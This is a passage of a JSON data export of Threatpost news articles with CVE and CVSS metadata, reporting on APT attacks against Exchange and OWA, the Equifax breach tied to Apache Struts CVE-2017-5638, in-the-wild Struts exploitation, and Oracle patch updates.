vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774>), a security-feature bypass vulnerability that affects Microsoft Outlook and enables attackers to execute arbitrary commands, researchers said.\n\n## **Other Services Under Attack**\n\nCybercriminals are also targeting services that support Exchange and OWA. For instance, client-access servers (CAS), which handle all client connections to Exchange Server 2010 and Exchange 2013, typically operate in web-login portals for services including OWA. Attackers with access to CAS may be able to deploy capabilities to steal user login credentials, researchers said.\n\n\u201cNotably, an advanced persistent threat actor reportedly deployed web shells to harvest credentials from OWA users as they logged in,\u201d they said.\n\nThe Windows Internet Information Services (IIS) platform, which supports OWA, is another increasing target. IIS is a web server software created by Microsoft for use with the Windows family. Researchers said they have observed SOURFACE, for instance, deploying custom Active Server Page Extended (ASPX) Web shells to IIS directories within the victim\u2019s OWA environment. These web shells would include discrete file names, to resemble legitimate files on the victim\u2019s system (for instance \u201clogin2.aspx\u201d instead of \u201clogin.aspx\u201d). And, to evade static detection, they typically contained limited functionality, often only file upload and download or command execution.\n\n\u201cSOURFACE operators altered their approach as the intrusion progressed. Instead of placing additional files to accomplish malicious functionality, the adversary appended web shell code to legitimate files within IIS,\u201d said researchers. \u201cIt is likely they did this to reduce the identification by network defenders and ensure persistent access, even if other web shell files were identified and removed.\u201d\n\nResearchers said moving forward, attackers will continue to innovate their techniques in attacking Microsoft services, like Exchange, in ways that will naturally challenge network defenders. Beyond malware, [Microsoft is top of the heap](<https://threatpost.com/microsoft-most-imitated-phishing/160255/>) when it comes to hacker impersonations \u2013 with Microsoft products and services featuring in nearly a fifth of all global brand phishing attacks in the third quarter of this year, according to Check Point researchers.\n\n\u201cState-aligned operators could continue \u2014 in most cases \u2014 to need to emphasize stealth and persistence to meet their intelligence- gathering goals,\u201d according to Accenture. \u201cSuch capabilities and detection evasion approaches underline the importance of identifying and tracking priority adversaries and then threat hunting against the specific behaviors employed by the priority adversaries.\u201d\n", "cvss3": {}, "published": "2020-10-19T15:09:06", "type": "threatpost", "title": "Microsoft Exchange, Outlook Under Siege By APTs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11774"], "modified": "2020-10-19T15:09:06", "id": "THREATPOST:BF27EB1E464BD713B35779742C991C59", "href": "https://threatpost.com/microsoft-exchange-outlook-apts/160273/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\n[![Equifax FTC](https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary-300x188.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary.png>)\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. \u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. \u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, that\u2019s when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayers identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. <https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png>)\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache. An attacker can trivially exploit the vulnerability to gain remote code execution by sending a HTTP request that contains a crafted Content-Type value. The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear as to why there\u2019s been a dropoff in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say.It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach \u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought. The company said there may have been up to 100,000 Canadians affected several weeks ago however upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says its still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48 hour period, Smith said.\n\nThat was never done and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer facing website for the breach was put hosted on a separate domain from the main Equifax website, the confusion that spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said, \u201cTalk about ham-handed responses this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. When told the company\u2019s original site couldn\u2019t handle the traffic is received, Murphy was befuddled.\n\n\u201cWhy wouldn\u2019t your website be able to handle this kind of traffic?\u201d Murphy asked, \u201cIt just doesn\u2019t make sense, a company your size and with your knowledge, doesn\u2019t understand how to handle traffic for over 100 million people, don\u2019t you use an Elastic cloud computing service that would\u2019ve accounted for this?\u201d\n\nSmith said the sheer amount of traffic Equifax\u2019s site received in wake of the breach made hosting a site on its domain impossible.\n\n\u201cThe environment the micro site is in is a cloud environment that\u2019s very, very scalable,\u201d Smith said. \u201cOur traditional environment could not handle 400 million consumer visits for three weeks.\u201d\n\nMurphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it\u2019s possible Equifax\u2019s internal scanning system could potentially miss another vulnerability.\n\n\u201cIf the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?\u201d Murphy asked.\n\nSmith skirted the question and instead discussed the difficulties associated with patching.\n\n\u201cPatching can take a variety of time\u2026 it can take days or up to a week or more,\u201d Smith said, adding that he wasn\u2019t aware of the particular Struts vulnerability at the time.\n\nAt the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California\u2019s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.\n\n\u201cI want to know when they did it, when they took care of [the patch]\u201d Eshoo said.\n\n\u201cThey took care of it in July because we never found it,\u201d Smith said. \u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:22", "description": "Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.\n\nRounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.\n\nOf the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle\u2019s popular Oracle E-Business Suite (EBS).\n\n\u201cWhile all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,\u201d said JP Perez-Etchegoyen, CTO of Onapsis.\n\nOnapsis is warning users of Oracle EBS (versions 12.1 and 12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network without any username and password credentials, to potentially gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.\n\nPerez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a business\u2019 enterprise resource planning, supply chain management or finance management systems.\n\n\u201cThese vulnerabilities are especially risky as an attacker would only need a web browser and network access to the EBS system HTTP interface to perform it,\u201d Perez-Etchegoyen said.\n\nOnapsis said vulnerabilities found in Oracle\u2019s EBS are on the rise, with a 29 percent increase in 2017 compared to the previous year.\n\nThe[ patches come](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) just weeks after Oracle OpenWorld where Larry Ellison, co-founder, executive chairman and chief technology officer of Oracle, stressed the importance of security during his keynote. Ellison also used the occasion to stress the importance of software patching in light of the [recent Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nLast month, Oracle used an advisory as an opportunity to remind users that [in April it ](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>)fixed the Struts vulnerability (CVE-2017-5638) which was behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>),\n\nOrganizations are falling down when it comes to patching their most important business-critical applications, Perez-Etchegoyen said.\n\nCiting a recent Ponemon Research study, Perez-Etchegoyen said fewer than half of the 600 respondents interviewed said they have a monthly plan to implement security patches for their Oracle EBS applications. Seventy percent believe it is likely their company would have a data breach due to insecure Oracle EBS applications that they have failed to secure or apply patches to.\n\nAlso part of Oracle\u2019s quarterly update are patches for its Java Platform, Standard Edition that received 22 new security fixes. Twenty of these vulnerabilities may be remotely exploitable without authentication, for example, they may be exploited over a network without requiring user credentials, Oracle said. The highest CVSS base score of vulnerabilities affecting Oracle Java SE is 9.6.\n\nImpacted are Java Advanced Management Console, Java SE, Java SE Embedded and JRockit.\n\nOracle Database Server received six security fixes with two of the vulnerabilities remotely exploitable without authentication. Affected Oracle Database Server components include Spatial (Apache Groovy), WLM (Apache Tomcat), Java VM, RDBMS Security, Core RDBMS and XML Database.\n", "cvss3": {}, "published": "2017-10-17T18:13:09", "type": "threatpost", "title": "Oracle Patches 250 Bugs in Quarterly Critical Patch Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10332", "CVE-2017-5638"], "modified": "2017-10-17T18:13:09", "id": "THREATPOST:0308A7143D92E14583CCD684912ABD67", "href": "https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also 